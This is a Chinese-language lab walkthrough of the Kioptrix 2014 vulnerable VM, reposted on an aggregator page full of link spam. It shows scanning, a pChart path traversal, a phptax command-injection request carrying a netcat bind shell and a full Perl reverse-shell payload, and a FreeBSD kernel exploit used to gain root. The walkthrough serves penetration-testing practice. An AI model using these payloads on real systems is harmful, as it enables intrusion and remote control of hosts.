当前位置: 首页 > news >正文

济南外贸网站个人建站项目

济南外贸网站,个人建站项目,icp备案管理系统,乐清门户网站建设个人博客 WuTongSec 欢迎大佬指点 打点 nmap 192.168.128.0/24 -sP 找ip nmap 192.168.128.137 --min-rate 10000 -p- 简单全端口扫描 nmap 192.168.128.137 -sC -sV -O -sT 详细 脚本 版本 系统 扫描 dirsearch -u http://192.168.128.137 目录扫描 PORT S…个人博客 WuTongSec 欢迎大佬指点 打点 nmap 192.168.128.0/24 -sP 找ip nmap 192.168.128.137 --min-rate 10000 -p- 简单全端口扫描 nmap 192.168.128.137 -sC -sV -O -sT 详细 脚本 版本 系统 扫描 dirsearch -u http://192.168.128.137 目录扫描 PORT     STATE SERVICE VERSION 22/tcp   closed ssh 80/tcp   open   http   Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 8080/tcp open   http   Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) ​ 源代码中有 cms框架 拼接一下接口 8080端口没有权限 利用 先搜索一下pChart2.1.3 exp exp版本对的上 把exp复制到当前目录 searchsploit pChart searchsploit pChart -m 31173 查看exp信息 有xss和路径穿越遍历 payload hxxp://localhost/examples/index.php?ActionViewScript%2f..%2f..%2fetc/passwd http://192.168.128.137/pChart2.1.3/examples/index.php?ActionViewScript%2f..%2f..%2fetc/passwd 在只能读取的情况下 尝试读取apache的默认配置文件 搜索一下FreeBSD系统下的apache的默认配置文件 ​ https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout https://cwiki.apache.org/ 是 Apache Software Foundation (ASF) 的一个 Confluence【汇流】 维基站点它为 ASF 旗下的各个项目提供了一个协作和文档管理的平台 /usr/local/etc/apache22/httpd.conf 结合文件读取 http://192.168.128.137/pChart2.1.3/examples/index.php?ActionViewScript%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf ServerRoot 和 DocumentRoot: ServerRoot 指定了 Apache 服务器的根目录。 DocumentRoot 指定了 Web 内容的根目录。了解这个路径有助于查找网站文件有时可能包含敏感信息或未公开的资源。 Directory 和 Files 指令: 这些指令定义了对特定目录和文件的访问控制。检查这些部分可以揭示是否存在宽松的安全设置例如允许目录浏览Options Indexes这可能会暴露文件结构给攻击者。 Include 指令: Include 可以加载额外的配置文件或目录中的所有 .conf 文件。确认哪些文件被包含进来因为它们可能含有其他重要的配置或者敏感信息。 LoadModule 指令: 列出了已加载的模块。某些模块如 mod_php, mod_perl, 或 mod_python 可能会提供额外的功能但也可能引入安全风险。特别是如果你看到不常见的模块应该进一步调查其功能和潜在影响。 ScriptAlias 和 Alias 指令: ScriptAlias 通常用于指定 CGI 脚本的执行路径。Alias 用来映射 URL 到文件系统中的某个位置。注意这些路径因为它们可能是执行任意代码或访问特殊资源的入口点。 ErrorLog 和 CustomLog 指令: 分别指定了错误日志和访问日志的位置。日志文件可能包含有关服务器行为的重要信息包括可能的错误、警告以及用户活动记录。特别要留意是否有关于 SQL 注入、命令注入等攻击尝试的日志条目。 意思是我们需要这个User-Agent头 SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser ​ GET /phptax/ HTTP/1.1 Host: 192.168.128.137:8080 Accept-Language: en-US Upgrade-Insecure-Requests: 1 User-Agent:Mozilla/4.0 Mozilla4_browser Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Referer: http://192.168.128.137:8080/ Accept-Encoding: gzip, deflate, br Connection: keep-alive 把数据包换一下 每次都要换Mozilla/4.0 Mozilla4_browser 有一个 phptax 查一下有没有exp 25849 这个exp 需要一个php_curl apt install里面没有那就换一个 这个exp是 一个命令执行的 可以反弹shell回来 靶机做好镜像 我自己很多时候发包没有回复 多恢复镜像可以了 http://localhost/phptax/drawimage.php?pfilezxxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;pdfmake http://192.168.128.137:8080/phptax/drawimage.php?pfilezxxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;pdfmake 数据包 GET /phptax/drawimage.php?pfilezxxx;%20id/tmp/111;pdfmake HTTP/1.1 Host: 192.168.128.137:8080 Accept-Language: en-US Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/4.0 Mozilla4_browser Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Referer: http://192.168.128.137:8080/ Accept-Encoding: gzip, deflate, br Connection: keep-alive 我们写一个命令 whoami/tmp/qwer 使用之前的读取文件payload可以看到是成功的 反弹shell nc -lvnp 4444 试了很多的反弹shell 还是只有perl 可以 GET /phptax/drawimage.php?pfilezxxx;%20perl%20-e%20use%20Socket%3b%24i%3d%22192.168.128.128%22%3b%24p%3d4444%3bsocket(S%2cPF_INET%2cSOCK_STREAM%2cgetprotobyname(%22tcp%22))%3bif(connect(S%2csockaddr_in(%24p%2cinet_aton(%24i))))%7bopen(STDIN%2c%22%3e%26S%22)%3bopen(STDOUT%2c%22%3e%26S%22)%3bopen(STDERR%2c%22%3e%26S%22)%3bexec(%22%2fbin%2fsh%20-i%22)%3b%7d%3b;pdfmake HTTP/1.1 Host: 192.168.128.137:8080 Accept-Language: en-US Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/4.0 Mozilla4_browser Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Referer: http://192.168.128.137:8080/ Accept-Encoding: gzip, deflate, br Connection: keep-alive ​ ​ 反弹shell命令 GET /phptax/drawimage.php?pfilezxxx; perl -e use Socket;$i192.168.128.128;$p4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(tcp));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,S);open(STDOUT,S);open(STDERR,S); 推荐一个插件 hack tools 很多实用的命令 反弹shell 命令行 提权 刚开始尝试了 suid提权 发现没有 ​ 计划任务 也不行 ​ sudo 也不行 ​ 那就只有内核提权了 去找exp ​ $ uname -a FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012     rootfarrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 上传nc -lvnp 233 28718.c 下载nc 192.168.128.128 233 28718.c 编译文件 生成的是默认 a.out 成功 总结 反弹shell有的多种 上传nc -lvnp 233 28718.c 下载nc 192.168.128.128 233 28718.c 这个地方是查各种系统 apache的默认文件信息的 DistrosDefaultLayout - HTTPD - Apache Software Foundation
http://www.dnsts.com.cn/news/219591.html

相关文章:

  • 2h1g做视频网站网站开发者id
  • 成都六度网站建设windows优化大师如何卸载
  • 网站开发软件有哪些google网页搜索
  • 免费网站建设新技术西安广告公司前十名
  • 浦东网站制作wordpress怎么做目录
  • 网站建设教程(任务2签订网站建设合同)题库网站的推广方案怎么写
  • 做芯片哪个网站推广品牌提升方案
  • 网站界面 欣赏自定义wordpress后台
  • wordpress查看自己网站的ip量做网站要不要交税
  • 福州做企业网站wordpress发布模块
  • 没有网站可以做百度快照怎么做微信商城开发报价
  • 公司网站模板凡建站网页设计个人主页模板
  • 中南建设网官方网站用一个口罩做一把枪
  • 深圳公司举报网站制作宝安网站建设
  • 如何开发一个微网站h5免费
  • 站酷网logo素材图库长沙网页设计学校
  • 2元域名注册网站济南建设工程交易中心
  • 网站和新媒体建设审批制度软件开发团队组成
  • 免费建立自己的网站空间智通人才招聘网东莞
  • 网站中的搜索功能怎么做的华为云云速建站
  • 元做网站室内设计公司排名2023
  • 网站和新媒体建设审批制度郑州网站商城建设
  • 制作个人网站南宁百度seo网站优化
  • 新乡网站搜索引擎优化wordpress 娱乐插件
  • 企业做网站的注意什么问题360商城官网
  • 网站备案成功后该怎么做wordpress 主体
  • 企业官网模板站广饶县住房和城乡建设局网站
  • 遵义网站建设中心大型网站开发心得
  • 编程培训班学费是多少seo代运营公司
  • 建设人才服务信息网国家网站么如何制作好自己的网站